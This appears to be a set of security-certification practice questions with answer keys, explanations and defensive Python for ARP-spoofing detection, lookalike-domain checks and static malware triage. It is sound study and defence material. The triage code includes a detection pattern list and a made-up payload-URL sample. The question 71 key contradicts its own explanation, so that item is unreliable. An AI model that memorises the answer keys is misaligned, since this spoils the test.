MCQmedium

An employee receives an email that appears to be from the company's CEO, requesting an urgent wire transfer to a vendor. The email address is slightly different from the CEO's actual address. Which type of social engineering attack is this?

A.Phishing
B.Vishing
C.Whaling
D.Spear phishing
AnswerC

Whaling targets senior executives with personalized attacks.

Why this answer

Whaling is spear phishing aimed at senior executives, typically to obtain wire transfers or sensitive information. Here the CEO's identity is the lure and the lookalike sender address is the tell. Exam items classify both the targeting of executives and the impersonation of them as whaling; outside the exam the latter is often called business email compromise (BEC) or CEO fraud.

65
MCQmedium

A security analyst notices that the ARP cache on a workstation contains multiple entries for the same IP address with different MAC addresses. Which attack is likely occurring?

A.ARP poisoning
B.Session hijacking
C.DNS spoofing
D.MAC flooding
AnswerA

ARP poisoning causes the MAC recorded for one IP to change or conflict because forged ARP replies keep overwriting it.

Why this answer

Conflicting MAC addresses for one IP (or the gateway's MAC changing) indicate ARP spoofing/poisoning: the attacker sends forged ARP replies so that hosts associate the attacker's MAC with the gateway's or victim's IP and send their traffic through the attacker. MAC flooding targets the switch's CAM table, not host ARP caches. Dynamic ARP Inspection on the switch, fed by DHCP snooping bindings, drops the forged replies.

66
MCQmedium

A security team discovers a file named 'svchost.exe' in a user's Temp folder. The file is signed by 'Microsoft Corporation' but the digital signature validation fails. Which analysis method should be used FIRST to determine if it's malicious?

A.Upload to VirusTotal
B.Dynamic analysis in a sandbox
C.Static analysis using strings and PEiD
D.Run the file on a production system to observe behavior
AnswerC

Correct. Static analysis can reveal suspicious strings, packing and an invalid signature without executing anything.

Why this answer

Static analysis (strings, imports, PE headers, section entropy, an Authenticode check) is the first step because it is safe and fast. An svchost.exe outside System32 whose Microsoft signature fails to validate is already a strong indicator. Uploading the sample to VirusTotal shares it publicly and can tip off the attacker that the intrusion was noticed, so look up the hash first and upload only if policy allows; sandbox detonation follows static triage; running the file on a production system is never acceptable.

67
Multi-Selecteasy

Which TWO of the following are types of malware analysis? (Select two.)

Select 2 answers
A.Static analysis
B.Memory analysis
C.Signature analysis
D.Dynamic analysis
E.Heuristic analysis
AnswersA, D

Correct. Static analysis reviews code and structure without execution.

Why this answer

Static analysis examines the file without executing it (e.g., examining strings, headers). Dynamic analysis executes the malware in a controlled environment (sandbox) to observe behavior.

68
MCQmedium

An organization wants to mitigate the impact of a DDoS attack that uses large volumes of UDP traffic to exhaust bandwidth. Which of the following techniques would be MOST effective?

A.Rate limiting on all ports
B.Deploying a scrubbing center
C.Blocking all UDP traffic
D.Implementing SYN cookies
AnswerB

Scrubbing centers can analyze and filter out malicious UDP traffic while allowing legitimate traffic.

Why this answer

Scrubbing centers separate malicious from legitimate traffic and return the clean traffic, which mitigates volumetric attacks provided the scrubbing capacity sits upstream of the saturated link (typically a cloud provider reached by BGP or DNS diversion). Rate limiting on all ports or blocking UDP outright drops legitimate traffic as well, and SYN cookies only address TCP SYN floods.

69
MCQhard

During a penetration test, a tester discovers that the target switch's MAC address table is full, causing it to flood traffic out all ports. The tester then captures network traffic using Wireshark on the same segment. Which attack was the tester performing?

A.DNS spoofing
B.MAC flooding
C.Session hijacking
D.ARP poisoning
AnswerB

MAC flooding fills the switch's CAM table, so it floods unknown-destination frames out every port like a hub.

Why this answer

MAC flooding sends frames with thousands of bogus source MACs (macof from the dsniff suite is the classic tool) to overflow the switch's CAM table; with no room to learn new addresses the switch floods frames to all ports, and a host on the segment can sniff traffic meant for others. Port security (a maximum MAC count per port with a violation action) prevents it.

70
Multi-Selectmedium

Which TWO tools are commonly used for ARP poisoning attacks?

Select 2 answers
A.Wireshark
B.Cain & Abel
C.tcpdump
D.Ettercap
E.Nmap
AnswersB, D

Cain & Abel is a Windows tool that includes ARP poisoning capabilities.

Why this answer

Ettercap and Cain & Abel are well-known tools for ARP poisoning, allowing attackers to intercept traffic on a LAN.

71
Multi-Selecthard

Which THREE of the following are common indicators of a man-in-the-middle attack using ARP spoofing? (Choose three.)

Select 3 answers
A.Multiple MAC addresses associated with the same IP in the ARP cache
B.Duplicate IP addresses in the ARP table
C.A sudden spike in DNS traffic
D.Unusual ARP replies without corresponding requests
E.Increased network latency on the victim's connection
AnswersB, D, E

ARP spoofing makes forged replies claim an IP for the attacker's MAC, so tables show duplicate or shifting mappings.

Why this answer

ARP spoofing shows up as one IP mapped to two MACs (duplicate IP entries), as replies that no host asked for (unsolicited or gratuitous ARP), and as higher latency because every packet takes a detour through the attacker. A DNS traffic spike is not an ARP indicator. Gratuitous ARP is also legitimate on boot or failover, so correlate it with the mapping conflict rather than alerting on it alone.
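The three indicators above, and the conflicting-MAC symptom in question 65, can be checked mechanically against captured ARP frames. The following is an added example, not code from the quiz; the frame tuple layout and the capture are constructed by hand (gateway 192.0.2.1 legitimately owns MAC ...:01, and ...:66 is the attacker), and the one-second request window is an assumption.

```python
"""Detect ARP poisoning indicators in a list of ARP frames.
Added example; the frame format and the sample capture are constructed."""
from collections import defaultdict

# (time_s, op, sender_mac, sender_ip, target_mac, target_ip); op 1 = request, 2 = reply
SAMPLE_ARP = [
    (0.0, 1, "aa:aa:aa:aa:aa:10", "192.0.2.16", "00:00:00:00:00:00", "192.0.2.1"),
    (0.1, 2, "aa:aa:aa:aa:aa:01", "192.0.2.1",  "aa:aa:aa:aa:aa:10", "192.0.2.16"),
    # attacker ...:66 claims to be the gateway, with no request preceding it
    (5.0, 2, "aa:aa:aa:aa:aa:66", "192.0.2.1",  "aa:aa:aa:aa:aa:10", "192.0.2.16"),
    (7.0, 2, "aa:aa:aa:aa:aa:66", "192.0.2.1",  "aa:aa:aa:aa:aa:10", "192.0.2.16"),
    # ...and claims to be the victim toward the gateway: two-sided MITM
    (7.1, 2, "aa:aa:aa:aa:aa:66", "192.0.2.16", "aa:aa:aa:aa:aa:01", "192.0.2.1"),
]

REQUEST_WINDOW = 1.0  # seconds: a reply later than this after the matching request is unsolicited


def ip_mac_conflicts(frames):
    """IPs claimed by more than one sender MAC (indicator A / question 65)."""
    macs_by_ip = defaultdict(set)
    for _t, _op, smac, sip, _tmac, _tip in frames:
        macs_by_ip[sip].add(smac)
    return {ip: sorted(macs) for ip, macs in macs_by_ip.items() if len(macs) > 1}


def unsolicited_replies(frames, window=REQUEST_WINDOW):
    """Replies that the target did not ask for within `window` seconds (indicator D).
    Legitimate gratuitous ARP also lands here, so use it together with the conflicts."""
    last_request = {}  # (asking_mac, asked_ip) -> time of the request
    hits = []
    for t, op, smac, sip, tmac, tip in sorted(frames):
        if op == 1:
            last_request[(smac, tip)] = t
        elif op == 2:
            asked = last_request.get((tmac, sip))
            if asked is None or t - asked > window:
                hits.append((t, smac, sip))
    return hits


def mac_claiming_many_ips(frames):
    """One MAC answering for two or more IPs: the two-sided MITM pattern."""
    ips_by_mac = defaultdict(set)
    for _t, op, smac, sip, _tmac, _tip in frames:
        if op == 2:
            ips_by_mac[smac].add(sip)
    return {mac: sorted(ips) for mac, ips in ips_by_mac.items() if len(ips) > 1}


if __name__ == "__main__":
    print("conflicts:", ip_mac_conflicts(SAMPLE_ARP))
    print("unsolicited:", unsolicited_replies(SAMPLE_ARP))
    print("multi-IP MACs:", mac_claiming_many_ips(SAMPLE_ARP))
```

A MAC that answers for both the gateway and a host, combined with a conflict on each of those IPs, is the signature of a full interception; a single unsolicited reply on its own is not enough to act on.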

72
MCQmedium

A security analyst notices that users receive emails from a known vendor requesting urgent payment to a new bank account. The email domain is misspelled (e.g., vvendorfake.com). Which type of social engineering is this?

A.Spear phishing
B.Whaling
C.Phishing
D.Vishing
AnswerA

Targeted emails with personalized context and spoofed domain indicate spear phishing.

Why this answer

Spear phishing targets specific individuals or organizations with personalized content, here a real vendor relationship and an invoice. The lookalike domain (an extra letter) and the urgency are classic indicators; a request to change bank details should be verified by calling the vendor at a number already on file, never one from the email.

73
MCQmedium

Which type of malware is characterized by modifying its own code to evade signature-based detection, often changing its appearance each time it replicates?

A.Polymorphic virus
B.Trojan horse
C.Macro virus
D.Boot sector virus
AnswerA

Polymorphic viruses change their code on each infection.

Why this answer

Polymorphic malware changes its code (but retains functionality) to avoid detection by signature-based antivirus.

74
MCQmedium

An organization receives an email that appears to be from the CEO, urgently requesting that the recipient wire funds to a new vendor. The email contains the CEO's name and title but the sender address is slightly misspelled. Which type of social engineering attack is this?

A.Pretexting
B.Whaling
C.Vishing
D.Spear phishing
AnswerB

Whaling targets senior executives with personalized scams.

Why this answer

Whaling targets senior executives (like the CEO) with personalized phishing, often for financial fraud. As in the earlier CEO item, the executive is impersonated rather than targeted, which outside the exam is usually filed under business email compromise (BEC) or CEO fraud; the misspelled sender address is the indicator to train staff on.
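The common thread in this item, question 64 and question 72 is a sender domain that is one letter off from a trusted one. The following is an added example, not code from the quiz, of a mail-gateway check for that pattern: edit distance after folding common homoglyph pairs, plus a check for a trusted brand reused inside an unrelated domain. The trusted list, the homoglyph table and the test addresses are constructed; vendorfake.com stands in for the vendor's real domain from question 72.

```python
"""Classify a sender address as trusted, lookalike or unrelated.
Added example; trusted domains, homoglyph table and sample senders are constructed."""

TRUSTED_DOMAINS = {"vendorfake.com", "example-corp.com"}

# Character sequences that read alike in common fonts, folded before comparison.
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("cl", "d"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]


def normalize(domain):
    """Lower-case and fold homoglyph pairs so 'exarnple' compares equal to 'example'."""
    d = domain.lower().strip(".")
    for pattern, replacement in HOMOGLYPHS:
        d = d.replace(pattern, replacement)
    return d


def levenshtein(a, b):
    """Standard edit distance (insert, delete, substitute), O(len(a)*len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_sender(address, trusted=TRUSTED_DOMAINS, max_distance=2):
    """Return ('trusted' | 'lookalike' | 'unrelated', matched_trusted_domain_or_None)."""
    domain = address.rsplit("@", 1)[-1].lower().rstrip(".")
    # exact match or a genuine subdomain of a trusted domain
    for t in trusted:
        if domain == t or domain.endswith("." + t):
            return "trusted", t
    # near-miss spelling, measured both raw and homoglyph-folded
    best = None
    for t in trusted:
        dist = min(levenshtein(domain, t), levenshtein(normalize(domain), normalize(t)))
        if dist <= max_distance and (best is None or dist < best[0]):
            best = (dist, t)
    if best is not None:
        return "lookalike", best[1]
    # trusted brand embedded in some other registrable domain
    for t in trusted:
        if t.split(".")[0] in domain:
            return "lookalike", t
    return "unrelated", None


if __name__ == "__main__":
    for addr in ("ap@vvendorfake.com", "ceo@exarnple-corp.com", "ar@mail.vendorfake.com",
                 "billing@vendorfake-payments.com", "bob@gmail.com"):
        print(f"{addr:35} {classify_sender(addr)}")
```

Treat "lookalike" as a reason to quarantine or warn, not as proof of fraud, and pair it with display-name checks: a message whose From display name matches an executive but whose domain is not yours is the other half of the CEO-fraud pattern.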

75
Multi-Selectmedium

Which TWO of the following are examples of static malware analysis techniques? (Select two.)

Select 2 answers
A.Running the malware in a sandbox
B.Capturing network traffic during execution
C.Monitoring process behavior with Process Monitor
D.Checking file hash on VirusTotal
E.Examining strings in the binary
AnswersD, E

A hash lookup on VirusTotal compares the file against already-known samples without executing your copy.

Why this answer

Static analysis examines the file without running it: string extraction reveals URLs, registry keys and API names, and a hash lookup on VirusTotal tells you whether the file is already known. Sandbox detonation, capturing traffic during execution and Process Monitor are dynamic analysis because the sample runs.
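The two static techniques named here, and the triage step in question 66, look like this in practice. The following is an added example, not code from the quiz: it hashes the file for a lookup, extracts printable strings the way the strings utility does, and measures per-section entropy, since a packed or encrypted section is near 8 bits per byte. It does not parse a real PE header; the "sections" are constructed byte blobs standing in for .text and .rsrc, and the suspicious-pattern list and entropy threshold are assumptions.

```python
"""Static triage of a binary: hash, strings and section entropy, no execution.
Added example; the sections below are constructed, not a real executable."""
import hashlib
import math
import random
import re


def shannon_entropy(data):
    """Bits per byte: 0.0 for a constant buffer, up to 8.0 for uniform random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def extract_strings(data, min_len=4):
    """Runs of printable ASCII at least min_len long, like the strings utility."""
    return [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


# Indicators worth a second look in an unsigned 'svchost.exe' found in Temp.
SUSPICIOUS = [re.compile(p, re.I) for p in (
    r"https?://", r"\bcmd\.exe\b", r"\bpowershell\b", r"CurrentVersion\\Run",
    r"VirtualAlloc", r"WriteProcessMemory", r"CreateRemoteThread",
)]


def triage(sections, packed_threshold=7.2):
    """Return the SHA-256 (for a hash lookup), sections that look packed, and
    any strings matching SUSPICIOUS. `sections` maps section name -> bytes."""
    blob = b"".join(sections.values())
    report = {
        "sha256": hashlib.sha256(blob).hexdigest(),
        "entropy": {name: round(shannon_entropy(data), 2) for name, data in sections.items()},
        "packed_sections": [name for name, data in sections.items()
                            if shannon_entropy(data) >= packed_threshold],
        "suspicious_strings": [s for s in extract_strings(blob)
                               if any(p.search(s) for p in SUSPICIOUS)],
    }
    return report


# Constructed sample: a code section with plaintext indicators and a
# high-entropy section simulating a packed or encrypted payload.
_rng = random.Random(1)
FAKE_SECTIONS = {
    ".text": (b"\x00" * 16
              + b"http://203.0.113.5/stage2.bin\x00"
              + b"MZ\x90\x00" * 8
              + b"Software\\Microsoft\\Windows\\CurrentVersion\\Run\x00"
              + b"kernel32.dll\x00VirtualAlloc\x00"),
    ".rsrc": bytes(_rng.randrange(256) for _ in range(4096)),
}


if __name__ == "__main__":
    r = triage(FAKE_SECTIONS)
    print("sha256:", r["sha256"])
    print("entropy:", r["entropy"])
    print("packed:", r["packed_sections"])
    for s in r["suspicious_strings"]:
        print("  ", s)
```

Strings and entropy are cheap and safe, which is why they come before detonation; a high-entropy section with almost no strings usually means the interesting strings only exist at run time, which is the cue to move to dynamic analysis in an isolated sandbox.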
